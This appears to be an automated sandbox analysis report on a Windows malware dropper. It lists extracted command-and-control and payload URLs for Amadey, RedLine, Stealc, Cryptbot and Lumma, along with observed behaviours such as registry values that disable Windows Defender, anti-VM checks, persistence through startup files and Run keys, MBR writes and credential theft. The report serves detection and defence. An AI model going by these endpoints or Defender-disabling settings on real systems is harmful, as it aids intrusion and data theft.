Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20250217-en -
resource tags
arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system -
submitted
18-02-2025 06:38
Static task
static1
Behavioral task
behavioral1
Sample
ffa05200d7a741017eb476eef981b041.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
ffa05200d7a741017eb476eef981b041.exe
Resource
win10v2004-20250217-en
General
-
Target
ffa05200d7a741017eb476eef981b041.exe
-
Size
2.1MB
-
MD5
ffa05200d7a741017eb476eef981b041
-
SHA1
2272ca724539b2e2bef16f3017c1e1e3db9e9485
-
SHA256
2e90e00abbd49c7a69771a8ec31862319a237bf5532768a4e20b627f636b8001
-
SHA512
55be906ff0385337b94ea090d1ccb3c4fd0e7d813adca5d6eccd2cfc40c1cbcf3f68a981cf0f97e457737a0b1b57745870e8ded6e58a6834556cd0bfcb8531a9
-
SSDEEP
49152:1CYg6rMK/aiLLsFf8lTlcZuY+1HSkB1SOpIBC8MiH:i6rbaiEiWH+YklIBC8MiH
Malware Config
Extracted
http://185.215.113.16/defend/random.exe
Extracted
http://185.215.113.16/mine/random.exe
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Extracted
redline
cheat
103.84.89.222:33791
Extracted
stealc
default
http://ecozessentials.com
-
url_path
/e6cb1c8fc7cd1659.php
Extracted
cryptbot
http://home.fivecc5vs.top/RkxPTSBLYxNxxrPaLizI17
Extracted
lumma
https://mercharena.biz/api
Signatures
-
Amadey family
-
Cryptbot family
-
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral2/memory/5132-959-0x00000000007A0000-0x0000000000BFA000-memory.dmp healer behavioral2/memory/5132-960-0x00000000007A0000-0x0000000000BFA000-memory.dmp healer behavioral2/memory/5132-1107-0x00000000007A0000-0x0000000000BFA000-memory.dmp healer -
Healer family
-
Lumma family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" TempG3Y2MGNWLFP14P11FT9FBBZPOCOL8G0T.EXE -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" TempG3Y2MGNWLFP14P11FT9FBBZPOCOL8G0T.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" TempG3Y2MGNWLFP14P11FT9FBBZPOCOL8G0T.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" TempG3Y2MGNWLFP14P11FT9FBBZPOCOL8G0T.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" TempG3Y2MGNWLFP14P11FT9FBBZPOCOL8G0T.EXE Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection TempG3Y2MGNWLFP14P11FT9FBBZPOCOL8G0T.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" TempG3Y2MGNWLFP14P11FT9FBBZPOCOL8G0T.EXE -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" TempG3Y2MGNWLFP14P11FT9FBBZPOCOL8G0T.EXE -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications TempG3Y2MGNWLFP14P11FT9FBBZPOCOL8G0T.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" TempG3Y2MGNWLFP14P11FT9FBBZPOCOL8G0T.EXE -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
Redline family
-
SectopRAT payload 2 IoCs
resource yara_rule behavioral2/memory/5084-199-0x0000000000F50000-0x00000000013C8000-memory.dmp family_sectoprat behavioral2/memory/5084-200-0x0000000000F50000-0x00000000013C8000-memory.dmp family_sectoprat -
Sectoprat family
-
Stealc family
-
Enumerates VirtualBox registry keys 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF 9198fa4ab8.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 19 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ffa05200d7a741017eb476eef981b041.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempG3Y2MGNWLFP14P11FT9FBBZPOCOL8G0T.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 268e0efb49.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ f4ad9992ae.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Fe36XBk.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ViGgA8C.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ sHN20me.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ m5UP2Yj.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 0ea2fa1e21.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ d2YQIJa.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ spoDnGT.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ae184ed5c1.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ d8935727ac.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 9198fa4ab8.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 37df517c12.exe -
Blocklisted process makes network request 64 IoCs
flow pid Process 53 5092 powershell.exe 56 5092 powershell.exe 61 5092 powershell.exe 64 5092 powershell.exe 70 5092 powershell.exe 80 5092 powershell.exe 84 5092 powershell.exe 86 5092 powershell.exe 87 5092 powershell.exe 91 5092 powershell.exe 94 5092 powershell.exe 95 5092 powershell.exe 110 5092 powershell.exe 111 5092 powershell.exe 116 5092 powershell.exe 117 5092 powershell.exe 118 5092 powershell.exe 119 5092 powershell.exe 120 5092 powershell.exe 121 5092 powershell.exe 122 5092 powershell.exe 123 5092 powershell.exe 125 5092 powershell.exe 126 5092 powershell.exe 127 5092 powershell.exe 128 5092 powershell.exe 129 5092 powershell.exe 130 5092 powershell.exe 131 5092 powershell.exe 132 5092 powershell.exe 144 5092 powershell.exe 146 5092 powershell.exe 147 5092 powershell.exe 148 5092 powershell.exe 151 5092 powershell.exe 152 5092 powershell.exe 153 5092 powershell.exe 156 5092 powershell.exe 160 5092 powershell.exe 161 5092 powershell.exe 164 5092 powershell.exe 165 5092 powershell.exe 169 5092 powershell.exe 170 5092 powershell.exe 172 5092 powershell.exe 174 5092 powershell.exe 180 5092 powershell.exe 183 5092 powershell.exe 184 5092 powershell.exe 186 5092 powershell.exe 197 5092 powershell.exe 203 5092 powershell.exe 214 5092 powershell.exe 218 5092 powershell.exe 231 1736 powershell.exe 232 5092 powershell.exe 235 5092 powershell.exe 236 5092 powershell.exe 237 5092 powershell.exe 238 5092 powershell.exe 243 5092 powershell.exe 246 5092 powershell.exe 251 5092 powershell.exe 252 6080 powershell.exe -
pid Process 2416 powershell.exe 5308 powershell.exe 5468 powershell.exe 5632 powershell.exe 6080 powershell.exe 4288 powershell.exe 1736 powershell.exe -
Downloads MZ/PE file 28 IoCs
flow pid Process 16 4852 skotes.exe 16 4852 skotes.exe 16 4852 skotes.exe 16 4852 skotes.exe 16 4852 skotes.exe 16 4852 skotes.exe 16 4852 skotes.exe 16 4852 skotes.exe 16 4852 skotes.exe 16 4852 skotes.exe 16 4852 skotes.exe 16 4852 skotes.exe 16 4852 skotes.exe 16 4852 skotes.exe 16 4852 skotes.exe 16 4852 skotes.exe 16 4852 skotes.exe 16 4852 skotes.exe 16 4852 skotes.exe 16 4852 skotes.exe 16 4852 skotes.exe 16 4852 skotes.exe 16 4852 skotes.exe 202 4852 skotes.exe 202 4852 skotes.exe 231 1736 powershell.exe 252 6080 powershell.exe 407 5208 futors.exe -
Uses browser remote debugging 2 TTPs 13 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 3112 chrome.exe 3680 chrome.exe 216 chrome.exe 5616 msedge.exe 6008 msedge.exe 5340 chrome.exe 2320 chrome.exe 1304 chrome.exe 5384 msedge.exe 4584 msedge.exe 5588 msedge.exe 5376 chrome.exe 3324 chrome.exe -
Checks BIOS information in registry 2 TTPs 36 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempG3Y2MGNWLFP14P11FT9FBBZPOCOL8G0T.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 9198fa4ab8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 9198fa4ab8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion m5UP2Yj.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ffa05200d7a741017eb476eef981b041.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion spoDnGT.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 37df517c12.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ffa05200d7a741017eb476eef981b041.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Fe36XBk.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ViGgA8C.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 268e0efb49.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion sHN20me.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion d8935727ac.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 0ea2fa1e21.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 37df517c12.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ViGgA8C.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion d2YQIJa.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ae184ed5c1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion d8935727ac.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Fe36XBk.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ae184ed5c1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 0ea2fa1e21.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion spoDnGT.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempG3Y2MGNWLFP14P11FT9FBBZPOCOL8G0T.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion d2YQIJa.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion sHN20me.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion m5UP2Yj.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 268e0efb49.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe -
Checks computer location settings 2 TTPs 7 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Control Panel\International\Geo\Nation 7aencsM.exe Key value queried \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Control Panel\International\Geo\Nation amnew.exe Key value queried \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Control Panel\International\Geo\Nation futors.exe Key value queried \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Control Panel\International\Geo\Nation ffa05200d7a741017eb476eef981b041.exe Key value queried \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Control Panel\International\Geo\Nation skotes.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat powershell.exe -
Executes dropped EXE 44 IoCs
pid Process 4852 skotes.exe 3752 f779cc9603.exe 5092 f779cc9603.exe 1724 13Z5sqy.exe 1016 jonbDes.exe 4644 Bjkm5hE.exe 2064 Bjkm5hE.exe 5096 Fe36XBk.exe 5084 ViGgA8C.exe 5080 DTQCxXZ.exe 3020 skotes.exe 5068 TaVOM7x.exe 1732 d2YQIJa.exe 3744 sHN20me.exe 4844 spoDnGT.exe 1932 Ta3ZyUR.exe 4288 Ta3ZyUR.exe 2428 Ta3ZyUR.exe 3144 qFqSpAp.exe 3708 m5UP2Yj.exe 2320 jROrnzx.exe 3252 jROrnzx.exe 5112 7aencsM.exe 4384 7aencsM.exe 2264 e40f8faca5.exe 5132 TempG3Y2MGNWLFP14P11FT9FBBZPOCOL8G0T.EXE 5828 ae184ed5c1.exe 5544 483d2fa8a0d53818306efeb32d3.exe 5792 d8935727ac.exe 5408 9198fa4ab8.exe 5288 skotes.exe 736 0ea2fa1e21.exe 1440 268e0efb49.exe 2064 5098d799cd.exe 5640 d9a0eaee0c.exe 4112 amnew.exe 5208 futors.exe 5524 jROrnzx.exe 1876 jROrnzx.exe 2688 qFqSpAp.exe 1280 37df517c12.exe 5848 trano1221.exe 4832 f4ad9992ae.exe 5628 trano1221.exe -
Identifies Wine through registry keys 2 TTPs 19 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine ffa05200d7a741017eb476eef981b041.exe Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine Fe36XBk.exe Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine d2YQIJa.exe Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine d8935727ac.exe Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine TempG3Y2MGNWLFP14P11FT9FBBZPOCOL8G0T.EXE Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine ae184ed5c1.exe Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine f4ad9992ae.exe Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine 37df517c12.exe Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine ViGgA8C.exe Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine sHN20me.exe Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine spoDnGT.exe Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine skotes.exe Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine m5UP2Yj.exe Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine 9198fa4ab8.exe Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine 0ea2fa1e21.exe Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine 268e0efb49.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" TempG3Y2MGNWLFP14P11FT9FBBZPOCOL8G0T.EXE Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features TempG3Y2MGNWLFP14P11FT9FBBZPOCOL8G0T.EXE -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\e40f8faca5.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1085378101\\e40f8faca5.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1085379021\\am_no.cmd" skotes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PHYSICALDRIVE0 Fe36XBk.exe -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x0007000000023d07-909.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 18 IoCs
pid Process 2012 ffa05200d7a741017eb476eef981b041.exe 4852 skotes.exe 5096 Fe36XBk.exe 5084 ViGgA8C.exe 3020 skotes.exe 1732 d2YQIJa.exe 3744 sHN20me.exe 4844 spoDnGT.exe 3708 m5UP2Yj.exe 5132 TempG3Y2MGNWLFP14P11FT9FBBZPOCOL8G0T.EXE 5828 ae184ed5c1.exe 5544 483d2fa8a0d53818306efeb32d3.exe 5792 d8935727ac.exe 5408 9198fa4ab8.exe 5288 skotes.exe 736 0ea2fa1e21.exe 1440 268e0efb49.exe 1280 37df517c12.exe -
Suspicious use of SetThreadContext 8 IoCs
description pid Process procid_target PID 3752 set thread context of 5092 3752 f779cc9603.exe 87 PID 4644 set thread context of 2064 4644 Bjkm5hE.exe 95 PID 1724 set thread context of 4664 1724 13Z5sqy.exe 113 PID 1932 set thread context of 2428 1932 Ta3ZyUR.exe 118 PID 2320 set thread context of 3252 2320 jROrnzx.exe 125 PID 5112 set thread context of 4384 5112 7aencsM.exe 130 PID 5068 set thread context of 224 5068 TaVOM7x.exe 150 PID 5524 set thread context of 1876 5524 jROrnzx.exe 211 -
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\Tasks\futors.job amnew.exe File created C:\Windows\Tasks\skotes.job ffa05200d7a741017eb476eef981b041.exe -
Detects Pyinstaller 1 IoCs
resource yara_rule behavioral2/files/0x0009000000023d41-1440.dat pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 7 IoCs
pid pid_target Process procid_target 4624 3752 WerFault.exe 86 2428 4644 WerFault.exe 94 4964 1932 WerFault.exe 116 1972 2320 WerFault.exe 123 2264 5112 WerFault.exe 128 5264 1440 WerFault.exe 190 4800 5524 WerFault.exe 209 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d2YQIJa.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language amnew.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language jROrnzx.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language qFqSpAp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Ta3ZyUR.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9198fa4ab8.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language e40f8faca5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 5098d799cd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language qFqSpAp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sHN20me.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Bjkm5hE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Ta3ZyUR.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language m5UP2Yj.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language jROrnzx.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7aencsM.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ae184ed5c1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language jROrnzx.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Bjkm5hE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language jROrnzx.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d9a0eaee0c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language futors.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ffa05200d7a741017eb476eef981b041.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language jonbDes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DTQCxXZ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Fe36XBk.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 268e0efb49.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ViGgA8C.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f779cc9603.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f779cc9603.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TaVOM7x.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f4ad9992ae.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempG3Y2MGNWLFP14P11FT9FBBZPOCOL8G0T.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d8935727ac.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language spoDnGT.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7aencsM.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 37df517c12.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 13Z5sqy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 0ea2fa1e21.exe -
Checks processor information in registry 2 TTPs 7 IoCs
Processor information is often read in order to detect sandboxing environments.
